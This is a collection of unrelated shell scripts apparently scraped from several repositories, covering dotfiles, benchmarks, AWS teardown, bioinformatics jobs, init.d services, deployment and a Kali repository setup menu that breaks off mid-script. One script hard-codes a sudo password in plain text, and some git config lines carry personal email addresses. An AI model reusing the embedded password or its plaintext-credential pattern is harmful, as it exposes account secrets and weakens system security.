export GREP_OPTIONS="--color=auto";
# Link Homebrew casks in `/Applications` rather than `~/Applications`
export HOMEBREW_CASK_OPTS="--appdir=/Applications";
export PATH=/usr/local/bin:/usr/local/sbin:/usr/bin:/bin:/usr/sbin:/sbin:/usr/local/share/npm/bin:~/.cabal/bin:~/programming/android-sdk/platform-tools:~/programming/KindleGen_Mac_i386_v2_8:$CLOJURESCRIPT_HOME/bin:/Applications/Racket\ v6.1.1/bin:/usr/local/opt/go/libexec/bin:/usr/local/go/bin
| true |
fd79fa332df88aac88a68eb9e9452ca5a799eed0 | Shell | soccertack/kvmperf | /tests/common.sh | UTF-8 | 640 | 3.078125 | 3 | [] | no_license | #!/bin/bash
# Shared configuration for the kvmperf test scripts.

# Optional per-machine overrides.
if [[ -f .localconf ]]; then
    source .localconf
fi

# Power measurement is off unless powerconf says otherwise.
DO_POWER=0
POWER_PID=0
if [[ -f powerconf ]]; then
    source powerconf
fi

# Log files and the /usr/bin/time invocations that append to them.
COLDLOG=cold.txt
TIMELOG=time.txt
TIME="/usr/bin/time --format=%e -o $TIMELOG --append"
COLDTIME="/usr/bin/time --format=%e -o $COLDLOG --append"

# Kernel tree used by the benchmarks.
KERNEL="linux-3.6"
KERNEL_TAR="$KERNEL.tar.bz2"

# Cap the repetition count when a limit is configured.
if [[ -n "$REPTS_LIM" && $REPTS_LIM -lt $REPTS ]]; then
    REPTS="$REPTS_LIM"
fi

# Host Type Specific Defines
if [[ "$TESTARCH" == "x86" ]]; then
    # cross-compile ARM binaries from an x86 host
    export ARCH=arm
    export CROSS_COMPILE=arm-linux-gnueabi-
else # ARM
    # native ARM build
    export ARCH=arm
    export CROSS_COMPILE=""
fi

if [[ -f power.sh ]]; then
    source power.sh
fi
| true |
e1f6f6d0a14789c37e13120d3897eb013b708460 | Shell | punalpatel/runtime-ci | /scripts/ci/deprovision-bosh-lite/task | UTF-8 | 489 | 3.328125 | 3 | [
"Apache-2.0"
] | permissive | #!/bin/bash
# Trace commands, abort on error, and treat unset variables as errors.
set -exu
# Collect the ids of every EC2 instance tagged with the bosh-lite name,
# space-separated, into instances-to-delete.
aws ec2 describe-instances --filters "Name=tag:Name,Values=${BOSH_LITE_NAME}" \
  --output text --query 'Reservations[*].Instances[*].InstanceId' | \
  tr '\n' ' ' > instances-to-delete
# -s: file exists and is non-empty, i.e. at least one instance matched.
if [ -s instances-to-delete ]
then
  echo "Deleting instances:"
  cat instances-to-delete
  aws ec2 terminate-instances --instance-ids $(cat instances-to-delete)
  # Block until AWS reports all of them terminated.
  aws ec2 wait instance-terminated --instance-ids $(cat instances-to-delete)
else
  echo "No instances to delete"
fi
| true |
822ac7265cf1e836dc6351d5267f7080eefa8419 | Shell | rgve/LiveRNome | /171030_StringTie_Assemble_all4mergedBAM_JNS.sh | UTF-8 | 1,116 | 3.34375 | 3 | [] | no_license | #!/bin/bash
#script for assembling novel GTF files from BAM files
#Made by Jonas N. Søndergaard
#Made on 171030
#UPPMAX commands (Uppsala Multidisciplinary Center for Advanced Computational Science)
#SBATCH -A uppmax_proj_number
#SBATCH -p core
#SBATCH -n 8
#SBATCH -t 4:00:00
#SBATCH -J 171030_StringTie_Assemble
#SBATCH --output=171030_StringTie_Assemble.out
#SBATCH --error=171030_StringTie_Assemble.err
#load packages. bioinfo-tools is loaded on uppmax in order to load all other packages used.
module load bioinfo-tools
module load StringTie/1.3.3
#file paths
BAM_PATH=/proj/BAMfiles_sorted
OUTPUT_PATH=/proj/StringTie/
REF_PATH=/proj/ref_genomes
#loop to assemble novel GTFs for 11 files
for i in {1..11}; do \
FILE_NAME=`sed "${i}q;d" siRNA.list`
stringtie \
-p 8 \
--rf \
-G ${REF_PATH}/gencode.v27.annotation.gtf \
-o ${OUTPUT_PATH}/${FILE_NAME}.gtf \
${BAM_PATH}/${FILE_NAME}*.bam
done
#Readme:
#-p: number of computational cores used to run the script
#--rf: Assumes a stranded library fr-firststrand as found with Illumina Truseq library prep protocol.
#-G: known annotations
#-o: output file name
| true |
b6f778fc5773135315b9424281d7289889d42f0d | Shell | rixycf/concourse-weblog-test | /scripts/hugo_generate.sh | UTF-8 | 510 | 2.640625 | 3 | [] | no_license | #!/bin/sh
# generate files
set -e
set -x
hugo -s resource-hugo
cd resource-hugo
pwd
cd public
# git pull
echo "test" >> test.txt
git config --global user.email "kasnake1013@gmail.com"
git config --global user.name "rixycf"
git status
git add .
git commit -m "concourse test"
cd ..
git clone public ../public_modified
# cd ../public_modified
#
# echo "test" >> test.txt
# pwd
#
# git config --global user.email "kasnake1013@gmail.com"
# git config --global user.name "rixycf"
# git status
# git add .
# git commit -m "concourse test"
| true |
0b6c6f7fca9fab01e0ed46fb1b88ad957f2dc9fd | Shell | Akilestar/Andon-Automated-RDP | /RDP/06062017/changeHostnameFILES.bsh | UTF-8 | 2,465 | 3.953125 | 4 | [] | no_license | #!/bin/bash
##Change Hostname Script
##Created by Nathan Knight
##Last Updated June 6th 2017
export lineSelect='1'
export lineName='No Line Selected'
export namePrefix='Andon'
export dept="No Department Selected"
export lineTextList="~/scripts/RDP/text\ files/AssemblyUsernames.text"
export rowNum='1'
printf '%s\n' "Department List"
printf '%s\n' "[1] Assembly"
printf '%s\n' "[2] Sensor"
printf '%s\n' "[3] Mounting"
printf '%s\n' "[4] Inspection"
printf '%s\n' "[5] Terminal Insertion \ Depanelizers"
printf '%s\n' "[6] EWP"
printf '%s\n' "[7] Other"
while [ "$dept" == "No Department Selected" ]; do
printf "%s\n" "Select Department"
read -p "" deptSelect
case $deptSelect in
[1]* ) dept='Assembly';;
[2]* ) dept='Sensor';;
[3]* ) dept='Mounting';;
[4]* ) dept='Inspection';;
[5]* ) dept='Terminal Insertion \- Depanelizers';;
[6]* ) dept='EWP';;
[7]* ) dept='Other';;
esac
done
printf "%s\n" "$dept"
#Department Line Lists
##Assembly
# Prompt the operator to pick a line from the given usernames file and
# record the choice.  Sets the globals the rest of the script relies
# on: lineTextList, lineList, rowNum and (ultimately) lineName.
# Factors out the selection logic that was duplicated verbatim for the
# Assembly and Sensor departments.
selectLineFromFile() {
    #set text list to correct file
    lineTextList="$1"
    #map text file lines to array
    mapfile -t lineList < "$lineTextList"
    #print line selection list
    printf "%s\n" "Line List"
    while IFS= read -r line; do
        printf "[%s]\t%s\n" "$rowNum" "$line"
        rowNum=$(($rowNum+1))
    done < "$lineTextList"
    #get user input
    while [ "$lineName" == "No Line Selected" ]; do
        printf "%s\n" "Select Line"
        #set line based on user input
        read -p "" lineSelect
        lineSelect=$(($lineSelect-1))
        lineName=${lineList[$lineSelect]}
    done
}

if [ "$dept" == 'Assembly' ]; then
    selectLineFromFile "/home/pi/scripts/RDP/text files/AssemblyUsernames.text"
fi
##Sensor
if [ "$dept" == 'Sensor' ]; then
    selectLineFromFile "/home/pi/scripts/RDP/text files/SensorUsernames.text"
fi
#Change Hostname
# Compose the new hostname from the fixed prefix and the chosen line.
HOSTNAME="$namePrefix$lineName"
echo $HOSTNAME
# The actual rename is still disabled -- uncomment to apply it.
#sudo hostname $HOSTNAME
| true |
0470bd7014d44b8fbcae96c33ddfc416de5fbaef | Shell | iiscsanjay/system_files | /Mac/FreeMacMemory.sh | UTF-8 | 431 | 2.84375 | 3 | [] | no_license | #!/bin/bash
# Poll macOS inactive memory every 2 minutes and purge it via sudo once
# it exceeds 300 MB.  SIGINT flips `running` so the loop stops after
# the current iteration.
running=1
# SECURITY: hard-coded sudo password (kept to preserve behavior);
# prefer a passwordless sudoers entry for /usr/sbin/purge instead.
PASS="dasSumitaba"
# Fix: the original trap body was '{echo ...}' -- a brace group needs a
# space after '{', so the handler raised a syntax error when Ctrl-C hit.
trap '{ echo "sigint"; running=0; }' SIGINT
while ((running)); do
    Report=$(/usr/bin/python3 /Users/sanjayk/Dropbox/git/Mac/memReport3.py | awk '/Inactive Memory:/ {print $3}')
    # Default an empty reading to 0 so the numeric test cannot error out.
    if [ "${Report:-0}" -ge 300 ] ; then
        echo "$PASS" | sudo -S purge
        Report=$(/usr/bin/python3 /Users/sanjayk/Dropbox/git/Mac/memReport3.py | awk '/Inactive Memory:/ {print $3}')
    fi
    sleep 120
done
| true |
1e8915b7daa1ab3a745f58b3db8bf144c4338ca3 | Shell | KevinsBobo/KevinsBobo.github.io | /_travis.sh | UTF-8 | 1,620 | 3.640625 | 4 | [
"CC0-1.0"
] | permissive | #!/bin/bash
#定义时间
time=`date +%Y-%m-%d\ %H:%M:%S`
#执行成功
function success(){
echo "success"
}
#执行失败
function failure(){
echo "failure"
}
#默认执行
function default(){
cd ./_site
cat <<EOF >> README.md
| 部署状态 | 集成结果 | 参考值 |
| -------- | -------------------------------------- | ----------------------------------- |
| 完成时间 | $time | yyyy-mm-dd hh:mm:ss |
| 部署环境 | $TRAVIS_OS_NAME + $TRAVIS_NODE_VERSION | window \| linux + stable |
| 部署类型 | $TRAVIS_EVENT_TYPE | push \| pull_request \| api \| cron |
| 启用Sudo | $TRAVIS_SUDO | false \| true |
| 仓库地址 | $TRAVIS_REPO_SLUG | owner_name/repo_name |
| 提交分支 | $TRAVIS_COMMIT | hash 16位 |
| 提交信息 | $TRAVIS_COMMIT_MESSAGE |
| Job ID | $TRAVIS_JOB_ID |
| Job NUM | $TRAVIS_JOB_NUMBER |
EOF
git init
git add --all .
git commit -m "Update Blog By TravisCI With Build $TRAVIS_BUILD_NUMBER"
# Github Pages
# git push --force --quiet "https://${REPO_TOKEN}@${GH_REF}" master:master
# Coding Pages
git push --force --quiet "https://${CODING_USER_NAME}:${CODE_TOKEN}@${CODING_REF}" master:master
}
# Dispatch on the Travis build-state argument; anything else (including
# no argument) runs the default deploy.
case $1 in
    "success")
        success
        ;;
    "failure")
        failure
        ;;
    *)
        default
esac
f9c82687df164bfa7b680b07e3450cf2cf08cd12 | Shell | jknightlab/ATACseq_pipeline | /Core_manuscript/compareParams/run_Fseq-parallel.sh | UTF-8 | 3,289 | 4.125 | 4 | [] | no_license | #/bin/bash
#$ -N fseq
#$ -P jknight.prjc -q short.qc
#$ -o stdout_Fseq -e sterr_Fseq.log -j y
#$ -cwd -V
### Run F-seq on a BED File With User-Specified Parameters
## JHendry, 2016/12/01
## Idea here is to take directory containing .bed file and generate
## an .npf file representing peak calls from F-seq algorithm
## run under certain parameters.
## Default for F-seq is to produce a .npf file for each chromosome:
## e.g. 1.npf 2.npf ... X.npf
## These files are concatenated into one .npf file, and
## the resultant file named to match the original .bed file.
## Finally, this .npf file is moved into a new directory
## which is named as follows:
##
## fseq<l-setting><t-setting>_<sample-name>
##
## This folder is created IF it does not already exist.
## The ultimate result is the original folder containing the .bed
## file is returned to its original state (all intermediary
## NPF files are removed, F-seq can be run again) and an .npf
## file representing peaks is moved into an informatively
## named directory for subsequent analysis.
## To achieve this, inputs are:
## $1 ---> .bed file containing directory
## $2 ---> value for F-seq -l parameter
## $3 ---> value for F-seq -t parameter
## Note: Chromosomal NPF files (1.npf, 2.npf etc.) produced by
## the F-seq algorithm are deposited in a temporary subdirectory
## created within the .bed file containing directory.
## This allows for run_Fseq.sh to be run multiple times simultaneously
## on the same .bed file containing directory without the chromosomal NPF
## files (1.npf.. etc.) being confused.
echo "**********************************************************************"
echo "Run on host: "`hostname`
echo "Operating system: "`uname -s`
echo "Username: "`whoami`
echo "Started at: "`date`
echo "**********************************************************************"
### Define Input Directory, Parameter Values, Get Input File Name
bedDir=$1
bedFile=$(ls $bedDir/*.bed)
bedFile=${bedFile##*/}
lengthVal=$2
threshVal=$3
echo "Input File Directory:"$bedDir
echo "File Name:"$bedFile
echo "Feature Length Value (-l): "$lengthVal
echo "Threshold Value (-t): "$threshVal
echo ""
### Temporary Subdirectory to Output 1.npf, 2.npf, ... X.npf files
npfDirPrefix=$(echo "fseql"$lengthVal"t"$threshVal)
tempNpfDir=$(echo $bedDir"/"$npfDirPrefix)
if [ ! -d "$tempNpfDir" ]; then
mkdir $tempNpfDir
echo "Making Temporary Output Directory:"$tempNpfDir
echo ""
fi
### Run F-seq
fseq -d $bedDir -o $tempNpfDir \
-f 0 \
-l $lengthVal \
-t $threshVal \
-of npf \
-v
echo ""
echo "F-seq Complete"
echo "Catenating Output..."
echo ""
### Make Destination Directory for NPF file
npfDirSuffixClrPath=${bedDir##*/}
npfDirSuffix=${npfDirSuffixClrPath%_*}
npfDir=$(echo $npfDirPrefix"_"$npfDirSuffix)
if [ ! -d "$npfDir" ]; then
mkdir $npfDir
echo "Making Destination Directory:"$npfDir
echo ""
fi
npfFileName=$(echo $npfDir"/"$bedFile | sed 's/.bed$/.npf/')
cat $tempNpfDir/*.npf > $npfFileName
rm -r $tempNpfDir
echo "Output File:" $npfFileName
echo "Output Directory:" $npfDir
echo ""
echo "**********************************************************************"
echo "Finished at: "`date`
echo "**********************************************************************"
echo ""
echo ""
echo ""
| true |
24d206f6119bdf4b6f97db93b982868d2da76f1f | Shell | pillaiuma/shell | /one2.sh | UTF-8 | 262 | 2.515625 | 3 | [] | no_license | #1 bin/bash
# Compute a monthly salary from the basic pay read on stdin.  All math
# is integer arithmetic, so fractions are truncated:
#   DP = 50% of basic; DA = 35%, HRA = 8%, MA = 3% of (basic + DP);
#   PF = 10% of (basic + DP), deducted from the total.
echo "Enter the basic amount:"
read b
dp=$(( b * 50 / 100 ))
gross=$(( b + dp ))   # basic + DP, the base for the remaining rates
da=$(( gross * 35 / 100 ))
hra=$(( gross * 8 / 100 ))
ma=$(( gross * 3 / 100 ))
pf=$(( gross * 10 / 100 ))
Salary=$(( b + dp + da + hra + ma - pf ))
echo "The Salary is: $Salary"
| true |
f10d399deb05bc471d94abe387faa2879a10cb86 | Shell | wileyj/public-puppet | /code/modules/local/base/files/etc/init.d/uchiwa | UTF-8 | 2,260 | 3.71875 | 4 | [] | no_license | #!/bin/sh
### BEGIN INIT INFO
# Provides: uchiwa
# Required-Start: $remote_fs $syslog
# Required-Stop: $remote_fs $syslog
# Default-Start: 2 3 4 5
# Default-Stop: 0 1 6
# Short-Description: Uchiwa, a Sensu dashboard.
# Description: Uchiwa, a Sensu dashboard, created by Simon Plourde.
### END INIT INFO
# Source function library.
. /etc/rc.d/init.d/functions
export PATH="$PATH:/usr/lib/golang/bin"
# Service identity and derived paths; 'user' runs the daemon and shares
# the service name.
name="uchiwa"
user="$name"
appdir="/opt/$name"
program="/opt/$name/$name.go"
log_dir="/var/log/$name"
args="-c $appdir/config.json -p $appdir/public"
pidfile="/var/run/$name.pid"
lockfile="/var/lock/subsys/$name"
# Ensure the log directory exists and is writable by the service user
# (group 'sensu').  The guard is always true since log_dir is set above.
if [[ ! -z $log_dir ]]
then
mkdir -p $log_dir
chown -R $name:sensu $log_dir
fi
# Allow distro-specific overrides of the variables above.
[ -r /etc/default/$name ] && . /etc/default/$name
[ -r /etc/sysconfig/$name ] && . /etc/sysconfig/$name
start() {
# Launch uchiwa in the background as $user and record its PID.
echo -n $"Starting $name: "
exec="cd $appdir && godep go run $name.go"
daemon "su -s /bin/sh $user -c '$exec >> $log_dir/uchiwa.log 2> $log_dir/uchiwa.err &' "
retval=$?
if [ $retval -eq 0 ]
then
getpid
# BUG FIX: the original tested [[ -z $pid ]], writing an *empty* pidfile
# when the process was NOT found and returning failure when it WAS
# found.  Record the PID only when the process is actually visible.
if [[ -n $pid ]]
then
echo "$pid" > "$pidfile"
else
# Process did not come up (or is not visible to ps yet).
return 2
fi
fi
echo
[ $retval -eq 0 ] && touch "$lockfile"
return $retval
}
# Stop the service via killproc and clean up the pid/lock files.
stop() {
echo -n $"Stopping $name: "
killproc $name
retval=$?
if [ $retval -eq 0 ]
then
rm -f $pidfile
rm -f $lockfile
fi
echo
return $retval
}
# Find the running process's PID.  NOTE(review): this matches any ps line
# containing "/tmp/go-build" AND the service name -- fragile if several
# go-run binaries are active; confirm uniqueness on the target host.
getpid(){
pid=`ps -ef | grep "/tmp/go-build" | grep $name | awk '{print $2}'`
}
# Report service status via the init-library 'status' helper.
rh_status() {
status $name
}
# Quiet status check for use in conditionals.
rh_status_q() {
rh_status >/dev/null 2>&1
}
# Forceful stop: sends HUP (not TERM/KILL) and removes the state files.
force_stop() {
if rh_status ; then
killall -HUP $name
rm -f $pidfile
rm -f $lockfile
fi
}
# Dispatch on the init action.  Note: '$1' is re-used as the function
# name for start/stop, so the action string must match a function above.
case "$1" in
start)
rh_status_q && exit 0
$1
;;
stop)
rh_status_q || exit 0
$1
;;
force-stop)
force_stop
;;
status)
rh_status
;;
restart)
stop
start
;;
*)
echo "Usage: $0 {start|stop|restart|status|force-stop}" >&2
exit 3
;;
esac
exit $?
7dfb7a48978bdb82bd572d89de97728453ec856f | Shell | yoanyomba123/dotfiles | /zsh/zshrc.d/path.zsh | UTF-8 | 330 | 3.296875 | 3 | [] | no_license | # path.zsh
#
# This is where PATH gets modified.
#
##################################################
# set PATH so it includes private bin if it exists
if [ -d "$HOME/bin" ] ; then
PATH="$HOME/bin:$PATH"
fi
# set PATH so it includes scripts if it exists
if [ -d "$HOME/scripts" ] ; then
PATH="$HOME/scripts:$PATH"
fi
| true |
afbc9127aa90e7653efe8adb7e2b0deb5d51b91e | Shell | elibarzilay/drag-to-scroll | /make-zip | UTF-8 | 141 | 2.703125 | 3 | [] | no_license | #!/bin/sh
cd "$(dirname "$0")"
name="$(basename "$PWD")"
rm -f "../$name.zip"
git archive --output="../$name.zip" --prefix="$name/" master
| true |
17ba4b83274d7ab43bb8029d0ab1d2f8b5f278b4 | Shell | georgehaws/Scripting | /Create_Subdirectories | UTF-8 | 534 | 4.0625 | 4 | [] | no_license | #!/usr/bin/bash
# This script loops over a list of cleaned input data and creates matching subdirectories.
# These folders will be used to hold our local .git working repositories.
# They are hosted at: https://github.com/learn-co-students/NAME_OF_DIRECTORY
# First, we declare our variables:
targetParentDir="/home/george/Documents/Flatiron/Learnco/"
# Then, we loop over our input file (passed as a command line argument) and create our folders:
while IFS= read -r line; do
mkdir -p "$targetParentDir""$line"
done < "$1"
| true |
fc7ad3c58e608c9c1f91a0034231551f5846099c | Shell | rvega/config | /key-remap/keyboard_microsoft.sh | UTF-8 | 676 | 2.65625 | 3 | [] | no_license | #!/bin/bash
# To figure out the keycodes I used
# `xmodmap -pke` and `xev`
# To figure out the "remove" lines, look at the output
# of `xmodmap`
# Read https://wiki.archlinux.org/index.php/Xmodmap
####
# Capslock as Ctrl
setxkbmap -option ctrl:nocaps
# xmodmap -e "remove lock = Caps_Lock" 2> /dev/null
# xmodmap -e "keycode 66 = Control_L NoSymbol Control_L"
# xmodmap -e "add control = Control_L"
# Right menu as Ctrl
xmodmap -e "keycode 135 = Control_R NoSymbol Control_R"
xmodmap -e "add control = Control_R"
# Key repetition delay.
gsettings set org.gnome.desktop.peripherals.keyboard delay 251
gsettings set org.gnome.desktop.peripherals.keyboard delay 250
| true |
a4c0aecf88fd55d3063dd96e1edde7f9e9344f0a | Shell | alist/swarmsBeagleBoardPythonClientServer | /startup/SWARMSd | UTF-8 | 777 | 3.21875 | 3 | [
"MIT"
] | permissive | #!/bin/sh
#
# Start/stop the SWARMS daemons
#
# This file is linked in the Beagleboards /etc/init.d folder
# Also, it is linked from init.d, in etc/rc0.d for termination, rc3.d for startup, and rc5.d for normal os running
set -e
case "$1" in
start)
echo -n "Starting SWARMSd: "
# Launch the Python driver in the background (-b) under the name SWARMSd.
start-stop-daemon -S -b -n SWARMSd -a /home/root/alex/drivePy/launchDrivePy.sh
echo "done"
;;
stop)
echo -n "Stopping SWARMSd: "
# Turn off the usr1 LED to signal the service is down.
echo 0 > /sys/class/leds/beagleboard\:\:usr1/brightness
# NOTE(review): this kills EVERY python process on the board, not just
# the SWARMS driver -- confirm nothing else runs python here.
killall python
start-stop-daemon -K -n SWARMSd
echo "done"
;;
restart)
# Re-invoke this script for stop then start.
$0 stop
$0 start
;;
*)
echo "Usage: SWARMSInit { start | stop | restart }" >&2
exit 1
;;
esac
exit 0
| true |
b301ed9b313c55ace66b6341ff1256b9e699f7fe | Shell | alexkb/pound-tools | /check_pound_active_interactive.sh | UTF-8 | 1,826 | 4.4375 | 4 | [] | no_license | #!/bin/sh
# check_pound_active_interactive.sh - Script for determining pound thread usage repeatedly.
#
# This script can be useful to run when you want to monitor pound thread usage, perhaps
# whilst running load tests and experimenting with pound settings.
# Customisable variables
CHECK_POUND_ACTIVE_SLEEP_TIME=2 # number of seconds to sleep between each check. Don't set this too quickly, as it might cause load itself potentially.
POUND_PID_PATH=/var/run/pound.pid
echo "Press Ctrl-c to cancel."
while [ 1 -eq 1 ] ; do
# Read in PID file each time, incase pound gets restarted during testing.
if [ ! -e $POUND_PID_PATH ]; then
echo "Pound PID file not found. Will try again in 5 seconds."
sleep 5
continue
fi;
POUND_PID=$((`cat $POUND_PID_PATH`+1))
POUND_OUTPUT=`find /proc/${POUND_PID}/task/*/syscall -type f -exec cat {} \; -exec echo "|" \;`
ACTIVE=0
INACTIVE=0
TOTAL=0
for i in $(echo $POUND_OUTPUT | tr "|" "\n")
do
if [[ "$i" -eq "202" ]]; then
INACTIVE=$[$INACTIVE +1]
TOTAL=$[$TOTAL +1]
elif [[ "$i" -eq "7" || "$i" -eq "35" ]]; then
ACTIVE=$[$ACTIVE +1]
TOTAL=$[$TOTAL +1]
fi
done
# There are usually around 3 active threads that shouldn't be counted.
ACTIVE=$[$ACTIVE -3]
TOTAL=$[$TOTAL -3]
# Using the bc tool to do floating point calculations
PERC=$(echo "$ACTIVE*100/$TOTAL" | bc)
# Debug stuff
#echo "Active/Total/Percentage: $ACTIVE/$TOTAL/$PERC"
if [ $PERC -lt 70 ] ; then
STATUSTXT=OK
STATUS=0
elif [ $PERC -lt 80 ] ; then
STATUSTXT=WARNING
STATUS=1
else
STATUSTXT=CRITICAL
STATUS=2
fi
echo -ne "$STATUSTXT - percentage active threads: $PERC% \r"
sleep $CHECK_POUND_ACTIVE_SLEEP_TIME
done # End while loop
# Break to a new line, due to the -ne above.
echo ""
| true |
9cdf7e2a047d27c5ab8603272fd82ed2e2b4d885 | Shell | jonasduerto/freepbx-scripts | /disableisymphony/disableisymphony.sh | UTF-8 | 1,011 | 3.15625 | 3 | [] | no_license | #!/bin/bash
#############################################
# Created by Alex Leach - @ajleach #
# FreePBXHosting.com - @freepbxhosting #
# VERSION 1.3 RELEASE DATE JUN 12 2015 #
# DESC: DISABLES ISYMPHONY IF INSTALLED #
#############################################
echo ""
if rpm -qa | egrep -q iSymphonyServerV3;
then
if chkconfig iSymphonyServerV3;
then
service iSymphonyServerV3 stop &> /dev/null
chkconfig iSymphonyServerV3 off
echo -e "iSymphonyServerV3 has been disabled.\n"
else
echo -e "iSymphonyServerV3 is already disabled.\n"
service iSymphonyServerV3 stop &> /dev/null
exit 0
fi
elif rpm -qa | egrep -q iSymphonyServer;
then
if chkconfig iSymphonyServer;
then
service iSymphonyServer stop &> /dev/null
chkconfig iSymphonyServer off
echo -e "iSymphonyServer has been disabled.\n"
else
echo -e "iSymphonyServer is already disabled.\n"
service iSymphonyServer stop &> /dev/null
exit 0
fi
else
echo -e "iSymphony does not appear to be installed."
fi
| true |
b50e9630717db65bc686cacee14e0fd093eb7e70 | Shell | elyoni/dotfiles | /mail/install.sh | UTF-8 | 537 | 3.4375 | 3 | [] | no_license | #!/bin/bash
DIR=$(dirname "${BASH_SOURCE[0]}")
DIR=$(cd -P $DIR && pwd)
function install_davmail()
{
sudo apt-get install default-jre -y
sudo apt install $DIR/davmail_5.4.0-3135-1_all.deb
}
function install_evolution()
{
sudo add-apt-repository ppa:gnome3-team/gnome3-staging -y
sudo apt-get update
sudo apt-get install evolution -y
}
function remove_evolution()
{
ppa-purge gnome3-team/gnome3-staging
ppa-purge gnome3-team/gnome3
}
function install()
{
install_davmail
install_evolution
}
"$@"
| true |
a16a9aa359297b44669eb0eeb080653dc150e241 | Shell | jhillas/pulp3-scripts | /delete_pulp3_rpm_repo.sh | UTF-8 | 771 | 3.53125 | 4 | [] | no_license | #!/bin/env bash
##########################################
# Script: delete_pulp3_rpm_repo.sh
#
##########################################
set -e
echo "Type the name of the rpm repository"
read REPONAME
export REPONAME=$REPONAME
echo "Delete rpm repo named: $REPONAME ? (y/n)"
read yn
if [ ${yn} != y ]; then
echo "You selected ${yn}, exiting"
exit
fi
echo
export BASE_ADDR=${BASE_ADDR:-http://localhost:24817}
export CONTENT_ADDR=${CONTENT_ADDR:-http://localhost:24816}
export DJANGO_SETTINGS_MODULE=pulpcore.app.settings
# Parse out pulp_href using http and jq
export REPO_HREF=$(http GET $BASE_ADDR/pulp/api/v3/repositories/rpm/rpm/ | jq -r '.results[] | select(.name == env.REPONAME) | .pulp_href')
# Delete Repository
http DELETE $BASE_ADDR$REPO_HREF
exit | true |
141b96100712ceba555bbe15eb00140cecbba398 | Shell | gnoliyil/fuchsia | /build/rbe/remotetool.sh | UTF-8 | 1,789 | 3.890625 | 4 | [
"BSD-2-Clause"
] | permissive | #!/bin/bash
# Copyright 2021 The Fuchsia Authors. All rights reserved.
# Use of this source code is governed by a BSD-style license that can be
# found in the LICENSE file.
# See https://github.com/bazelbuild/remote-apis-sdks
set -uo pipefail
script="$0"
script_dir="$(dirname "$script")"
# defaults
config="$script_dir"/fuchsia-re-client.cfg
remotetool="$(which remotetool)" || {
cat <<EOF
No 'remotetool' found in PATH.
'remotetool' can be built and installed from:
https://github.com/bazelbuild/remote-apis-sdks
EOF
exit 1
}
usage() {
cat <<EOF
$script [remotetool options]
This script wraps around the 'remotetool' tool for convenience, by fixing
some common options.
remotetool --help:
EOF
"$remotetool" --help
}
remotetool_args=()
prev_opt=
# Extract script options before --
for opt
do
# handle --option arg
if test -n "$prev_opt"
then
eval "$prev_opt"=\$opt
prev_opt=
shift
continue
fi
# Extract optarg from --opt=optarg
case "$opt" in
*=?*) optarg=$(expr "X$opt" : '[^=]*=\(.*\)') ;;
*=) optarg= ;;
esac
case "$opt" in
--help|-h) usage; exit;;
# Forward all other options to remotetool
*) remotetool_args+=("$opt") ;;
esac
shift
done
test -z "$prev_opt" || { echo "Option is missing argument to set $prev_opt." ; exit 1;}
# Grab RBE action parameters from the config file.
service="$(grep "^service=" "$config" | cut -d= -f2)"
instance="$(grep "^instance=" "$config" | cut -d= -f2)"
auto_args=(
--service "$service"
--instance "$instance"
)
if grep -q "^use_application_default_credentials=true" "$config"
then auto_args+=( --use_application_default_credentials )
fi
full_command=( "$remotetool" "${auto_args[@]}" "${remotetool_args[@]}" )
echo "${full_command[@]}"
exec "${full_command[@]}"
| true |
f2e9b310241bb96a0d60d04010bcfcf651659317 | Shell | concanon-dev/ExtremeSearch | /oldmake/make-xsconvert.sh | UTF-8 | 723 | 2.734375 | 3 | [] | no_license | #
#
# (c) 2012-2014 Scianta Analytics LLC All Rights Reserved.
# Reproduction or unauthorized use is prohibited. Unauthorized
# use is illegal. Violators will be prosecuted. This software
# contains proprietary trade and business secrets.
#
# Select the compiler and platform-specific object directory from $OSTYPE.
if [ "$OSTYPE" = "cygwin" ]; then
 gcc='x86_64-w64-mingw32-gcc -D _UNICODE'
 Platform='Win/x64'
elif [[ $OSTYPE == darwin* ]]; then
 # BUG FIX: the original pattern 'darwin1?' only matched darwin10-darwin19
 # (macOS 10.6-10.15); on darwin2x (Big Sur and later) the build fell
 # through to the Linux branch.
 gcc=gcc
 Platform='Mac'
else
 gcc=gcc
 Platform='Linux/x64'
fi
$gcc -o python/xsconvert -Wall -O2 -lm obj/$Platform/xsconvert.o obj/$Platform/saContext.o obj/$Platform/saContextCreate.o obj/$Platform/saConcept.o obj/$Platform/OLDsaLoadContext.o obj/$Platform/saOpenFile.o obj/$Platform/saSplunk.o obj/$Platform/saCSV.o -lm
| true |
30a71a948b0e7907603e29c9743810024168ba28 | Shell | zacknorman/StartScripts | /anon-os-utility.sh | UTF-8 | 2,333 | 3.75 | 4 | [] | no_license | #!/bin/bash
echo "$(tput setaf 6)!!THIS SCRIPT HAS ELEMENTS FROM THE PARROT AI SCRIPT!!$(tput sgr0)"
show_menu(){
NORMAL=`echo "\033[m"`
MENU=`echo "\033[36m"` #Blue
NUMBER=`echo "\033[33m"` #yellow
FGRED=`echo "\033[41m"`
RED_TEXT=`echo "\033[31m"`
ENTER_LINE=`echo "\033[33m"`
echo -e "${MENU}*********************************************${NORMAL}"
echo -e "$(tput setaf 3)Welcome to the Anon OS Utility [made by zaCC]$(tput sgr0)"
echo -e "\t\trev 0.1 07/20/2016"
echo -e "${MENU}**${NUMBER} 1)${MENU} Full Install [codename: kali-bleeding-edge] ${NORMAL}"
echo -e "${MENU}*********************************************${NORMAL}"
echo -e "${ENTER_LINE}Please enter a menu option and enter or ${RED_TEXT}enter to exit. ${NORMAL}"
echo -e "$(tput setaf 5) MORE FEATURES COMING SOON...$(tput sgr0)"
read opt
}
function option_picked() {
COLOR='\033[01;31m' # bold red
RESET='\033[00;00m' # normal white
MESSAGE=${@:-"${RESET}Error: Try again"}
echo -e "${COLOR}${MESSAGE}${RESET}"
}
function core_install() {
echo -e "deb http://http.kali.org/kali kali-rolling main contrib non-free" >> /etc/apt/sources.list
echo -e "deb http://http.kali.org/kali kali-bleeding-edge contrib non-free main" >> /etc/apt/sources.list
apt-get update
gpg --keyserver pgpkeys.mit.edu --recv-key ED444FF07D8D0BF6
gpg -a --export ED444FF07D8D0BF6 | apt-key add -
apt-get update
}
function init_function() {
clear
show_menu
while [ opt != '' ]
do
if [[ $opt = "" ]]; then
exit;
else
case $opt in
1) clear;
option_picked "Let's do this, then!";
core_install;
option_picked "it worked, try ' apt install setoolkit -t kali-bleeding-edge'!";
exit;
;;
x)exit;
;;
q)exit;
;;
\n)exit;
;;
*)clear;
option_picked "Invalid keypress";
show_menu;
;;
esac
fi
done
}
if [ `whoami` == "root" ]; then
init_function;
else
